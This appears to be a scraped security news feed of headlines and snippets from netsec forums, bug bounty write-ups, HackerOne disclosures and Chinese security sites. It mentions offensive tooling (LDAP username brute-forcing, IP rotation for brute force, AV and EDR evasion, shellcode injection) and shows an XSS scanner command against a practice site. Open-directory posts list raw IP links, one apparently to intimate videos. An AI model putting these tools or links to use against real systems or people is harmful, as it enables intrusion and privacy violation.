    The services below are some of the most commonly abused services for malicious parties to “live off the land”. Each is built into Windows… Continue reading on InfoSec Write-ups »
    30 Search Engines for Cybersecurity Researchers (Part 2 of 3)
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 1 of 3)
    No content preview
    Write-up: JWT authentication bypass via weak signing key @ PortSwigger Academy
    No content preview
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    Cool Recon techniques every hacker misses! Episode 2
    No content preview
  • Open

    Microsoft Sees No Need to Fix New Teams Vulnerability
    Article URL: https://www.thurrott.com/cloud/microsoft-365/273122/microsoft-sees-no-need-to-fix-new-teams-vulnerability Comments URL: https://news.ycombinator.com/item?id=32897138 Points: 2 # Comments: 1
  • Open

    FreeBuf Morning Report | A third of enterprises leave sensitive cloud data unencrypted; US embassy and consulates in China over-collect Chinese employees' information
    The report reveals that 36% of enterprises have unencrypted sensitive data, such as company secrets and personally identifiable information, mixed into their cloud assets.
    Java Security Fundamentals (1): A Brief Overview of the Java EE Layered Model and the MVC Framework
    I have only just started learning Java security and am keeping a record here; I will keep adding content on Java security. If anything is inaccurate, I hope the experts will correct me.
    Cheating on crash tests? Hacker exposes Tesla's use of “special code”
    The hacker claims Tesla has been adding code that references crash-testing organizations, including ANCAP and EuroNCAP, which have just tested the Model Y.
    “Leaked” coffee! Hacker sells data on nearly 220,000 Starbucks Singapore customers
    The incident may have exposed sensitive personal information including customer names, gender, dates of birth, mobile numbers, email addresses and home addresses.
    Public Cloud Attack and Defense Series: Exploiting Cloud Services
    This article introduces vulnerabilities and related attack techniques affecting cloud services offered by public cloud vendors, showing that cloud services can bring unforeseen risks along with their convenience.
    FreeBuf Morning Report | US sets up dedicated unit to combat cryptocurrency crime; InterContinental Hotels hit by destructive cyberattack
    The US Department of Justice has formed the Digital Asset Coordinators Network specifically to combat cryptocurrency crime.
  • Open

    Staying Under the Radar - PPID Spoofing and Blocking DLLs
    https://crypt0ace.github.io/posts/Staying-under-the-Radar/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Crack Pre-Shared Key of WPA/WPA2 from Live Network
    submitted by /u/tbhaxor [link] [comments]
    LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed
    Here's my new tool "LDAP nom nom", which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds. As far as I know there are no logs generated for this, so detecting this requires custom network level monitoring. If you're pentesting a new environment, and don't know where to start, you can detect existence of about 10M usernames in less than 30 minutes (10K names/sec). From there on, it could be a question of looking for really dubious account names like "admintest" or "tempadmin" which might have the same password as the account name. This can be attempted by kerberoasting or direct logins (this is noisy and generates events). Reception of this small tool has been terrific, with more than 200 stars on Github in less than 24 hours, which is crazy compared to the other stuff I've released. https://github.com/lkarlslund/ldapnomnom submitted by /u/lkarlslund [link] [comments]
  • Open

    Apple doing #passwordless wrong and no one gives a flying fsck?
    Seriously? Nobody noticed that Apple broke the fundamental u2f principle "don't export keys, enroll devices when needed"? upd: It would also be a mistake to compare passkeys to "passwords you need to memorize". A comparison to passwords that were securely generated and stored in good old keychain would be more correct. Moving to webauthn as implemented by Apple eliminates the "shared secret" and thus blocks exactly three "moderately important" attack vectors: More dumb-targeted phishing attempts (regular phishing would not work because browser would not automatically fill the password on the phisher's site, so it requires manual interaction anyway, but if an evil guy manages to convince a user to override this behavior..) Browser-side leaks and malicious plugins Server-side leaks But that's all! It is not remotely as secure as properly implemented u2f. submitted by /u/arkenoi [link] [comments]
  • Open

    Stealing Files from USB Drives and Defending Against It: A Guide
    Author: moyun@墨云科技VLab Team Original link: https://mp.weixin.qq.com/s/LcgSc2lNBS6iQgHO88vmKg In recent years, cyberattacks carried out with a USB drive as the medium have been common. The 2010 Stuxnet incident used a Windows shortcut vulnerability triggered from a USB drive; in 2014 security researchers presented the USB-based BadUSB attack at BlackHat, which also relied on the USB drive as its medium; ...
    Hackers push tech support scam ads on Microsoft Edge's news feed page
    Author: Threat Intelligence Team Translator: Knownsec 404 Lab translation group Original link: https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam Although Google Chrome remains the top browser, more and more users are switching to the Chrome-source-based Microsoft...
  • Open

    There is no rate limit for SME REGISTRATION PORTAL
    MTN Group disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1305766

  • Open

    Cellebrite Physical Analyzer Messages export
    I have an iPhone image. Can you filter (narrow) down to a specific phone number and export all messages (chats, iMessage, IMs, SMS, MMS) to a single report (excel, pdf, etc.)? Doesn’t seem to be a way to do this. Maybe I’m missing something. It’s either all (every item on the image) or nothing. submitted by /u/hw60068n [link] [comments]
  • Open

    First CTF Writeup, Cody’s First Blog!
    I’ve been in the cyber security field for a while now, and I finally decided to start writing some sort of a blog! :) Continue reading on Medium »
    Bug Bounty { How I found an Sensitive Information Disclosure( Reconnaissance ) }
    Hello everyone, Welcome Back! Continue reading on System Weakness »
    Bug Bounty { How I found an Sensitive Information Disclosure( Reconnaissance ) }
    Hello everyone, Welcome Back! Continue reading on Medium »
    The Beautiful Art Of Finding Subdomains
    A plethora of subdomain finding tools is available on the web, leaving bounty hunters with options to choose from. But before we dive any… Continue reading on Medium »
    Cool Recon techniques every hacker misses! Episode 2
    Welcome to the 2nd Episode of Cool Recon Techniques. We are back with some more cool recon techniques which we think hackers out there… Continue reading on InfoSec Write-ups »
    Authentication Bypass — Bypass OTP Verification
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India😊. Continue reading on Medium »
    SSRF ATTACK LEADING TO AWS METADATA
    Hello folks, Continue reading on Medium »
    Exploiting Stack-based Buffer Overflow on Windows x64 | Step by Step explanation | Part-2
    Hello Security folks, Tejas here :) I hope you all are doing great. In previous writeup, we reached at the point where we were able to… Continue reading on Medium »
    Session Management Part — 2
    Let us learn some more vulnerbailities related to Sessions Continue reading on Medium »
  • Open

    duoreverse — A duo_client API wrapper for red teams
    tl;dr — duoreverse is a proof-of-concept tool red teams can leverage to conduct multiple attack techniques against a target’s Duo instance. Continue reading on Medium »
  • Open

    ldapnomnom: Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)
    submitted by /u/sanitybit [link] [comments]
    kubernetes-sec-alert: Track Kubernetes CVEs by native GitHub notifications!
    submitted by /u/mostafahussein [link] [comments]
    requests-ip-rotator: A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.
    submitted by /u/sanitybit [link] [comments]
    Virtual FIDO is a virtual USB device that implements the FIDO2/U2F protocol (like a YubiKey) in order to support 2FA and WebAuthN.
    submitted by /u/sanitybit [link] [comments]
  • Open

    Top OSINT sources and vishing pretexts from DEF CON’s social engineering competition
    This year, I was invited to be a judge for the vishing competition at the Social Engineering Community at DEF CON, the world’s largest… Continue reading on Medium »
    Some words about SpiderFoot…
    Igor S. Bederov Continue reading on Medium »
    SPY NEWS: 2022 — Week 37
    Summary of the espionage-related news stories for the Week 37 (September 11–18) of 2022. Continue reading on Medium »
    Methods for identifying cryptocurrency wallets in OSINT
    Igor S. Bederov Continue reading on Medium »
  • Open

    Teslas Hackers Have Found Another Unauthorized Access Vulnerability
    Article URL: https://jalopnik.com/teslas-hackers-have-found-another-unauthorized-access-v-1849535920 Comments URL: https://news.ycombinator.com/item?id=32889602 Points: 3 # Comments: 2
    A vulnerability disclosed in Profanity, an Ethereum vanity address tool
    Article URL: https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c Comments URL: https://news.ycombinator.com/item?id=32886910 Points: 2 # Comments: 0
  • Open

    don't like these folders, maybe you do. didn't look = NSFW
    everything here is 1234.mp4 (number only) in folders, like 00:1A:79:0A:FD:1A/ also, some are 10G+ http://91.219.96.148:88/media/bb2/ submitted by /u/thats_dumberst [link] [comments]
    recipes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Best Red Teamers to follow on Twitter?
    Hello! I am a pentester making the move towards full-time red teaming soon. My twitter feed is excellent for app and bug bounty news/techniques/etc, but I am looking to diversify this and get some more red team stuff. Anything is useful. I tried to have a quick look through this subreddit for someone previously asking this but couldn't see; if there is somewhere please point me out and I'll move over there and delete this! Thanks submitted by /u/maxicorbs [link] [comments]
  • Open

    SecWiki News 2022-09-18 Review
    Building a next-generation logging system on ClickHouse in practice by ourren; eCapture bystander: capturing Android HTTPS plaintext without a CA certificate by 路人甲; For more recent articles, visit SecWiki
  • Open

    Suricata - Syslog
    Hello, I am reaching out as I cannot get this figured out. I have suricata installed and running on my network, and it's working. There are entries in the fast.log. However I cannot get it to report to a syslog. I have it turned on in the yaml file, so it's not that; just no syslog software is picking up the details (I have tried too many different syslog programs and nothing seems to work). I am running this on a windows machine. All I want is a way to quickly view the logs (not using fast.log) and get email alerts of priority 1 msgs. Thanks for any help! submitted by /u/h4X6 [link] [comments]
    How do websites block screenshots
    Hi AskNetsec, I tried to take a screenshot of a course on Udemy for a diagram and I couldn't. Udemy has this screenshot protection. I am a Senior Engineer and I would not even know how to implement this. submitted by /u/CyberStagist [link] [comments]
  • Open

    HTML Injection in email via Name field
    HackerOne disclosed a bug submitted by mega7: https://hackerone.com/reports/1581499 - Bounty: $500
  • Open

    Bypassing Detection: A Brief Analysis of Executor Memory Shells (Memory Shell Series, Part 5)
    An Executor memory shell that can evade detection

  • Open

    Why do ransomware gangs only infect the business and not their users?
    I was wondering if a hacking ring owned a network and was able to deploy ransomware all over it. Have there been any cases where they went after the company's users/clients by infecting them through a phishing scheme or software update? submitted by /u/Lonelybiscuit07 [link] [comments]
    Evading WinDefender ATP credential-theft: kernel version
    submitted by /u/dmchell [link] [comments]
    Introduction to Threat Intelligence ETW
    submitted by /u/dmchell [link] [comments]
  • Open

    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I was able to bypass OTP using Response Manipulation
    $whoami Continue reading on Medium »
    Story of a reserved CVE-2022–23361
    Hello hackers, hope you guys are doing well and hunting lots of bugs. This is gonna be my first write-up, as the title says I will tell… Continue reading on Medium »
    Bug Bounty Challenge Update #1 — Bug Hacking
    Hi everyone. Continue reading on Medium »
    LDAP Injection and Why it Occurs
    WHAT IS LDAP INJECTION? Continue reading on CodeX »
    Stored XSS via Upload function at Filename parameter.
    Stored XSS bug via exploiting the filename parameter through upload function. Continue reading on Medium »
    How I made the multiple hall of fame in Nokia within 2 minutes
    HoF (HALL OF FAME) for reporting a single bug on their several domains through their Nokia vulnerability disclosure Continue reading on System Weakness »
    Ookeenga Official Testnet and Bug Bounty Event — $3,000 Prize Pool
    Chieftains, we’re thrilled to announce an exciting new milestone for Ookeenga — Our Testnet is finally here! Continue reading on Medium »
  • Open

    #100DaysOfHacking Day 85
    On this Saturday we are working on a few things. Continue reading on Medium »
    Webshell vs. Defender: Evading Anti-Virus For Fun & (Not) Profit
    Introduction: This write-up touches upon basic methodology behind modifying a webshell, in order bypass detection by an Anti-Virus… Continue reading on Medium »
    The Lay of the land
    Learn about and get hands-on with common technologies and security products used in corporate environments; both host and network-based… Continue reading on Medium »
  • Open

    LLVM Passes for Security: A Brief Introduction (Part 1/4)
    submitted by /u/sanitybit [link] [comments]
    Securing the Supply Chain of Nothing
    submitted by /u/sanitybit [link] [comments]
  • Open

    SecWiki News 2022-09-17 Review
    GoTestWAF: automated evaluation of web application security by ourren; A detailed summary of JWT authentication attacks by ourren; A brief analysis of the Uber hack by ourren; For more recent articles, visit SecWiki
  • Open

    Airflow Daemon Mode Insecure Umask Privilege Escalation
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1690093 - Bounty: $2400
  • Open

    GCFA practice test to give away
    A kind person from this thread gave me their unused GCFE practice test awhile back, so I’d like to pay it forward and give away a GCFA practice test I didn’t use. What was something nice you did for someone this week? I’ll pick an answer at random to select the recipient :) submitted by /u/1239870abc [link] [comments]
  • Open

    OSINT in Metaverse?
    For understanding OSINT in metaverse, you should know what actually metaverse is. Continue reading on Medium »
  • Open

    Chat.db
    If someone had access to your chat.db file/your apple id and login, could they alter it from a remote place? submitted by /u/Adventurous-North522 [link] [comments]
  • Open

    Small collection of Arabic music
    http://www.asmreekasounds.com/songs/mp3/arabic/ submitted by /u/Shot-Occasion418 [link] [comments]

  • Open

    Help with heap exploitation
    Hi, for example I have this code: do { buf = malloc(500); memset(buf, 0, 500); a = recv(socket, buf, 499, 0); } while (a > 0); I understand the problem is that the buffer is never freed and it allocates the same buffer again and again, but I don't understand how I can use this memory leak for exploitation. Thank you very much. submitted by /u/secret1337secret [link] [comments]
  • Open

    A bunch of chain mail letters, some from the 1920s
    http://www.silcom.com/~barnowl/chain-letter/archive/%21content.html submitted by /u/Shot-Occasion418 [link] [comments]
    NSFW - loads of female masturbation videos
    http://108.185.100.229/VideoDownloader/ submitted by /u/omahajackhawk [link] [comments]
    D&D Stuff
    http://frpworld.com/downloads/ submitted by /u/c-rn [link] [comments]
    How do I stop wget from generating these files when downloading ODs?
    submitted by /u/c-rn [link] [comments]
  • Open

    Getting Paid With Just Picking Color — Bug Bounty
    Suppppp guysss, this is my first write-up about bug bounty, let me introduce myself, my name is Redza you can call me za, ja, dza, red, or… Continue reading on Medium »
    CVE-2022–37700 Directory Transversal in ZenTao Easy soft ALM v16.5
    I am Shubham Sudhir Sawant a Security Researcher, super thrilled to write my very first blog. Continue reading on Medium »
    Hacking tool details Beginners
    Anonymously Hiding Tools: Continue reading on Medium »
    Tip’s to choose a bug bounty program
    Hi everyone! I’m back with another blog, this time I realized that my blogs about bug bounty had a lot of views so I’m back with a blog… Continue reading on Medium »
    The Tale Of SSRF To RCE on .GOV Domain
    Welcome back, I hope everyone is well. Without further hesitation let’s dive into it! Continue reading on Medium »
    Your First Bug (Burp Suite)
    Cc: InsidePHD Continue reading on System Weakness »
    How I Hacked my College’s student portal
    Hey guys, I am back again with another writeup about how I found a seviour bug in my college’s student portal which leads to a data leak… Continue reading on InfoSec Write-ups »
    Information Gathering:
    gathering different kinds of information about the target. Continue reading on Medium »
    Abusing Broken Link In Fitbit (Google Acquisition) To Collect BugBounty Reports On Behalf Of Google!
    I usually track acquisitions of websites for which I am hunting bugs regularly… Continue reading on InfoSec Write-ups »
    No rate limit to SMS bombing..
    Hello everyone, Continue reading on Medium »
  • Open

    Finding PID and key@comment in core file
    I am trying to find the ssh-agent key@comment in a core file. Does anyone know how to find it? I have tried gdb and using ghidra but I haven’t found any useful information. Maybe I’m missing something simple? submitted by /u/Critical-Balance7980 [link] [comments]
    Forensic Imaging Software besides FTK Imager?
    What are you guys/gals using besides FTK Imager to do disk images (on live PCs or loose media) on a regular basis? Does Encase Imager even exist / is it still supported? Can only find docs and no downloads on their site post Opentext acquisition. Tableau Imager is also under the Opentext acquisition, has had no updates since 2020, and seems to require a forensic bridge, making it unsuitable as a live imaging tool. Also does not support logical images. X-Ways is still faster than FTK Imager, but the requirement for using a dongle is a major downside. Lots of laptops out there only have one USB port and that means either X-Ways can't work or it needs a hub, so worst case we are documenting changes that the hub makes in addition to artifacts from the dongle and the connected drive, and best case there's multiple USB ports but we're still documenting twice as much investigator impact as FTK imager running straight off its own destination device. Magnet has Acquire, but this is a massive program that requires .Net libraries which are almost guaranteed not to be on your target machine if attempting a live capture, and it doesn't support making logical images, a big downside in an era with so much full disk encryption. submitted by /u/QuietForensics [link] [comments]
    UFED 4PC prices
    Hello everybody, I've been working in Computer and Mobile Forensics for about a year. I have a couple of clients a month and the business is not bad. I would like to purchase UFED 4PC or some other forensic software, especially for doing Mobile Forensics. Unfortunately, I still can't afford to spend $7500+. Are there any solutions? Obviously legal, to save money? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    XSS in www.glassdoor.com
    Glassdoor disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1695989 - Bounty: $500
    SSRF via potential filter bypass with too lax local domain checking
    Nextcloud disclosed a bug submitted by tomorrowisnew_: https://hackerone.com/reports/1608039
    Last video frame is still sent after video is disabled in a call
    Nextcloud disclosed a bug submitted by daniel_calvino_sanchez: https://hackerone.com/reports/1641088
    Information exposure in in guzzlehttp/guzzle (https://github.com/nextcloud/3rdparty/tree/master/guzzlehttp/guzzle)
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1604606
  • Open

    cloudvelo: An experimental Velociraptor implementation using cloud infrastructure
    submitted by /u/sanitybit [link] [comments]
    DylibHijackTest: Discover DYLD_INSERT_LIBRARIES hijacks on macOS
    submitted by /u/sanitybit [link] [comments]
    A Basic Guide to iOS Testing in 2022
    submitted by /u/sanitybit [link] [comments]
    Jetty Features for Hacking Web Apps
    submitted by /u/sanitybit [link] [comments]
    Staged Payloads from Kali Linux | PT Phone Home – DNS
    submitted by /u/sanitybit [link] [comments]
    Uber hacked, internal systems breached and vulnerability reports stolen
    submitted by /u/Fugitif [link] [comments]
    Cloning internal Google repos for fun and… info?
    submitted by /u/lukeberner [link] [comments]
    Undermining Microsoft Teams Security by Mining Tokens
    submitted by /u/flexibeast [link] [comments]
  • Open

    Investigating violent & distressing content as part of OSINT investigations
    Working on OSINT investigations can be a fun and thoroughly rewarding activity that anyone can contribute to. Continue reading on Medium »
  • Open

    Uber hacked, internal systems breached and vulnerability reports stolen
    Article URL: https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Comments URL: https://news.ycombinator.com/item?id=32869450 Points: 4 # Comments: 1
    Vulnerability allows access to credentials in Microsoft Teams
    Article URL: https://www.scmagazine.com/analysis/cloud-security/vulnerability-allows-access-to-credentials-in-microsoft-teams Comments URL: https://news.ycombinator.com/item?id=32866108 Points: 1 # Comments: 1
    Token storage vulnerability in MS Teams
    Article URL: https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens Comments URL: https://news.ycombinator.com/item?id=32864203 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-09-16 Review
    NPM supply chain security best practices guide by 路人甲; Reproducing and post-exploiting common GitLab vulnerabilities by 路人甲; SEVulDet: a semantics-enhanced system vulnerability detector by ourren; Distinguishing personal information, sensitive personal information and private information in one article by ourren; For more recent articles, visit SecWiki
  • Open

    EarlyBird Shellcode Injection in C#
    https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Recording on site
    As a pentester, I sometimes have to go on site to look for physical / social vulnerabilities. I'm currently using a gopro and just started experimenting with a voice recorder (Philips DVT2810). However, the go pro isn't very stealthy. The voice recorder is invisible in my pocket, but wasn't picking up conversations the way I hoped and is lacking video evidence of course. What do you use to record when it needs to be stealthy? Edit: some people pointed out that this might be illegal. In my country it’s allowed as long as I’m part of the conversation. submitted by /u/Amtrox [link] [comments]
    question regarding win10 privilege escalation without cmd or powershell
    Currently doing a ctf challenge where you need to unencrypt a heavily locked down drive encrypted with bitlocker. I've done some tinkering and I think I've landed on a solution involving using a powershell privilege escalation exploit to create a new admin user, logging in to it and disabling bitlocker from the control panel. However, part of the exercise involves both powershell and the command prompt being put behind a blacklist, meaning I can't use something like powershdll to run powershell scripts from cmd. Is there any other way to do this? Or is my approach to this problem completely wrong? submitted by /u/Xianthu_Exists [link] [comments]
    Looking for thoughts, advice, or known prior art of building an alternative to hooking: behavior baseline by predicting a limited subset of machine code's probable control flow in memory at runtime.
    Hooking is pretty easy to beat. It's efficient, low overhead, but unreliable. It also results in very low resolution scrutiny of program behavior. I think I have an idea, not to replace hooking, but maybe add a more resilient redundant behavior analysis mechanism. Computational overhead is my primary concern, and also I'm unsure how often you can halt a process's normal execution flow to do this without noticeable performance impact. To be honest, I'm actually not even sure how, without implementing this in the kernel, you would, at some interval, redirect the instruction pointer to your analysis code (by force, not by hooking) and also protect it from attacker modification. But I think the idea itself is interesting enough to be discussion-worthy. I think the defender's best option to de…
  • Open

    Social Engineering simply explained.
    1. What is Social Engineering? Continue reading on Medium »
  • Open

    Zero-Day Exploit Detection Using Machine Learning
    Deep learning models can help defenders improve zero-day exploit detection. We provide case studies focused on command injection and SQL injection. The post Zero-Day Exploit Detection Using Machine Learning appeared first on Unit 42.
  • Open

    FreeBuf Weekly | The Cybersecurity Law is set to be amended; Ukrainian cyberattacks paralyze 2,400 Russian websites
    We have summarized and recommended this week's hot news, security incidents, good reads and handy tools, so that nobody misses any of the week's highlights!
    Cyber Powers Series | Australia: Hidden Worries from an Island in the Ocean
    Surrounded by sea on all sides and geopolitically far from any strong ally, Australia has always seemed quite sensitive to its surroundings, and cyberspace is no exception.
    New malware bundle self-propagates via YouTube videos
    A new malware bundle self-propagates through victims' YouTube channels.
    The cost and difficulty of attack attribution | FreeBuf enterprise-side group discussion
    As an important part of post-incident response, attack attribution helps enterprises reconstruct, to some extent, the attacker's path and techniques, and use that to strengthen their defenses and avoid repeat attacks as far as possible. In practice, however, the difficulty of attribution and how controllable its time cost is are often hard to estimate, and it can even cause considerable internal overhead. Faced with attribution that sometimes cannot be avoided, how should enterprises evaluate it, and in what ways can attribution efficiency be improved? In this edition we take enterprise attack attribution as the topic and discuss these questions.
    The National Information Security Standardization Technical Committee releases "Information Security Technology: Requirements for Network Data Classification and Grading" (draft for comment)
    The Classification and Grading Requirements set out the principles and methods for classifying and grading data, including the basic principles of data classification and grading, the data classification framework and methods, and the data grading framework and methods.
    Attackers launch large-scale phishing campaigns in the name of mourning Queen Elizabeth II
    Security researchers have found that phishing attacks using lures such as "the Queen's death" and "mourning the Queen" are on a continuing upward trend.
  • Open

    How to investigate logs after Wordpress compromise
    Hi, I am trying to figure out how my wordpress site has been hacked (index.php replaced with some nasty code). Comparing with backups, I can determine that this happened after yesterday 11pm, since in that backup index.php was clean. What should I search for in apache logs? POST requests? I have no suspicious logins in FTP or cPanel or Wordpress backend, so I assume they hacked through some vulnerable plugin/theme. Thank you! submitted by /u/g-simon [link] [comments]
    Why does mimikatz use :: when it was written in C?
    According to the mimikatz author, Benjamin Delpy (gentilkiwi) at https://github.com/gentilkiwi/mimikatz: mimikatz is a tool I've made to learn C ... I'm not a programmer and can't stop thinking about it, so I googled it and found :: is actually used in C++ and not C, as discussed at quora https://www.quora.com/What-does-mean-in-C-programming-2 The :: operator is the C++ scope resolution operator. It has no meaning in C. C and C++ are different languages. My question is why does mimikatz use :: and not an argument or flag just like any other program? submitted by /u/w0lfcat [link] [comments]
    Open source vs. Closed source
    I've been reading an article about how a redis commander exploit can lead to database leakage ( https://blog.criminalip.io/2022/09/06/redis-database-leaks/ ) and I was wondering whether the general rule of thumb is that open source projects are more vulnerable to data breaches because they have exposed code? I've been receiving mixed answers so I'd appreciate any/all insight, thanks. submitted by /u/cheeztoshobo [link] [comments]
  • Open

    Dalfox 2.8 Release 🚀
    Hi hackers! Dalfox v2.8 has been released 🚀 There are not many added features this release. But it’s better than before, so I recommend an update :D Thank you ❤️ First, thank you so much to all contributors!! Release note Github | DockerHub | GHCR New Add --report and --report-format flags Improve PA(Parameter Analysis) Logic in JS Scan HAR format supported (FILE Mode) Improve FILE/PIPE Banner Improve JSON Printing And Fixed Bugs Report Flags You can now view the pretty results through the --report flag. dalfox url https://xss-game.appspot.com/level1/frame --report And you can choose the report style with the --report-format flag. dalfox url https://xss-game.appspot.com/level1/frame --report --report-format json Result Object ParamResult is now added to the Result. In addition to the actual XSS results, you can handle Parameter Analysis results. type Result struct { Logs []string `json:"logs"` PoCs []PoC `json:"pocs"` Params []ParamResult `json:"params"` Duration time.Duration `json:"duration"` StartTime time.Time `json:"start_time"` EndTime time.Time `json:"end_time"` } type ParamResult struct { Name string Type string Reflected bool ReflectedPoint string ReflectedCode string Chars []string } Sample code package main import ( "fmt" "encoding/json" dalfox "github.com/hahwul/dalfox/v2/lib" ) func main() { opt := dalfox.Options{ Cookie: "ABCD=1234", } result, err := dalfox.NewScan(dalfox.Target{ URL: "https://xss-game.appspot.com/level1/frame", Method: "GET", Options: opt, }) if err != nil...

  • Open

    All about: Open Redirects
    Sites often use HTTP or URL parameters to redirect users to a specified URL without any user action. While this behavior can be useful, it… Continue reading on Medium »
    Network Segmentation PenTesting
    Happy Engineer's Day Continue reading on Medium »
    ARTEMIS: TAEBIT’s first bug bounty program
    Welcome aboard AstroNut 👨‍🚀👩🏻‍🚀🧑🏽‍🚀 Continue reading on Medium »
  • Open

    ODSHOT! Would you like to get it back!
    Several years ago, an up-to-date list of all the working dirs of this sub from its start was regularly shared here. Would you like to restart this adventure? View Poll submitted by /u/SubliminalPoet [link] [comments]
    Open Directory Index
    I've created an index site. I have indexed the last couple of months' worth of shared ODs, as well as some of my own finds. I would like to get your guys' feedback on it. Just before the comments start to flow: I know the look and feel isn't great, but I've coded it all myself without any templates and I am no designer. I know the search is a little bit slow. I've been playing with indexes on my SQL tables to see if that helps. I know ODCrawler looks way better and searches way faster. This is a new experiment for me as a new developer, so please be easy. With that said, I welcome all constructive feedback. So far I have personally used this index to watch multiple movies and find some ROMs. Let me know if you are able to find anything useful or see any value in what I am doing here. Additionally, if you want to submit an OD for me to index, please feel free. I have 4 worker nodes actively indexing submitted URLs. https://opendirindex.opensho.com/index.php submitted by /u/coldmateplus [link] [comments]
  • Open

    OFAC Sanctions update 14.09.22
    Additional 2 individuals have been added to the OFAC Sanctioned list as of 14.09.2022. Those two individuals are suspected of processing… Continue reading on Medium »
  • Open

    store internal email disclosed through shopify-data-exporter
    Shopify disclosed a bug submitted by xenx: https://hackerone.com/reports/1605962 - Bounty: $500
    [hta3] Remote Code Execution on https:// via improper access control to SCORM Zip upload/import
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/1122791 - Bounty: $2000
    No validation to Image upload user can upload ( php APK zip files and can be used as storage purpose)
    Linktree disclosed a bug submitted by bug_vs_me: https://hackerone.com/reports/1644062 - Bounty: $750
  • Open

    Magento Supply Chain Attack Targets Extension Developer FishPig
    Magento store owners using the popular FishPig extensions should be wary of a recent supply chain attack which compromised their software repository. FishPig released a detailed security announcement on September 13th, 2022. The attack is estimated to have occurred on or before August 19th of this year so any eCommerce stores which have installed FishPig extensions since this date have likely been compromised. Website administrators should completely remove, reinstall, and upgrade all instances of FishPig software present within their environment and check their systems for any signs of infection. Continue reading Magento Supply Chain Attack Targets Extension Developer FishPig at Sucuri Blog.
  • Open

    NPM Malware Targeting HubSpot’s Bucky Client
    submitted by /u/louis11 [link] [comments]
    CVE North Stars: Leverage CVEs to kickstart your next vulnerability hunting adventure
    submitted by /u/onlinereadme [link] [comments]
    The Blind Spots of BloodHound
    submitted by /u/0xfffffg [link] [comments]
    Getting started with gVisor support in Falco
    submitted by /u/vjjmiras [link] [comments]
    A Detailed Analysis of the Quantum Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Buffer overflow in the OpenRazer open-source kernel drivers causing denial of service and privilege escalation.
    submitted by /u/jat0369 [link] [comments]
    Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Traces of Windows remote command execution
    submitted by /u/jeandrew [link] [comments]
    It pays to be Circomspect
    submitted by /u/Gallus [link] [comments]
  • Open

    WordPress Sites Hacked via Zero-Day Vulnerability in WPGateway Plugin
    Article URL: https://thecyberexpress.com/wordpress-sites-hacked-via-zero-day-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32854692 Points: 2 # Comments: 1
  • Open

    Speeding up Chrome on Android Startup with Freeze Dried Tabs
    We believe that "good enough" is never enough when it comes to pushing the performance of Chrome. Today’s The Fast and the Curious post explores how we sped up the startup times of Chrome on Android by more than 20% by providing an interactive freeze-dried preview of a tab on startup. Read on to see how the screenshot falls short, and freeze-drying your tabs makes for a better browser. Background and Motivation Rendering web content can be computationally intensive and can feel slow at times compared to a native application. A lot of work needs to be done to dynamically load resources over the network, run JavaScript, render CSS, fonts, etc. On mobile devices this is particularly challenging and Chrome can often only keep a handful of web pages loaded at a time due to the memory constrai…
  • Open

    Cellebrite Touch 2
    Hi all, I haven’t been working on forensics for a few years. Haven’t been up to speed with the latest and greatest on mobile forensics. Is the Cellebrite Touch 2 still a dependable solution to capture iPhones? What are your thoughts? Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    SecWiki News 2022-09-15 Review
    Google's Road to Data Security Automation (White Paper) by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Ahhh, This Emulation is Just Right: Introducing Micro Emulation Plans
    Written by Mike Cunningham and Jamie Williams Continue reading on MITRE-Engenuity »
  • Open

    Practical Attacks against NTLMv1
    1.1 Introduction This blog is meant to serve as a guide for practical exploitation of systems that allow the NTLMv1 authentication protocol. While NTLMv1 is hardly ever needed anymore, a surprising number of organizations still use it, perhaps unknowingly. There are, however, some VPN products that still currently instruct their users to downgrade NTLM... The post Practical Attacks against NTLMv1 appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | U.S. announces sanctions on 10 Iranian cyber-army members; 60% of respondents believe they have been subjected to "price discrimination against loyal customers"
    On September 14, the U.S. Treasury's Office of Foreign Assets Control announced sanctions against 10 individuals and two entities affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC).
    Former security chief accuses Twitter of "prioritizing profit over security"
    The Twitter platform ignored his security concerns and has lagged behind industry security standards for more than a decade.
    A hugely popular gay dating app abroad has been targeted by cybercrime operations
    Attackers lure users by promoting domains for various scams and unsafe Google Chrome extensions.
